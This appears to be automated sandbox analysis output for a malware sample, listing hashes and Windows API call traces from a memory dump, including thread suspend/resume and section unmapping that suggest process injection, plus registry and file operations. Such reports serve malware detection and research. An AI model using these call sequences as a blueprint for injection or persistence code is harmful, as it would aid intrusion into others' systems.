  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
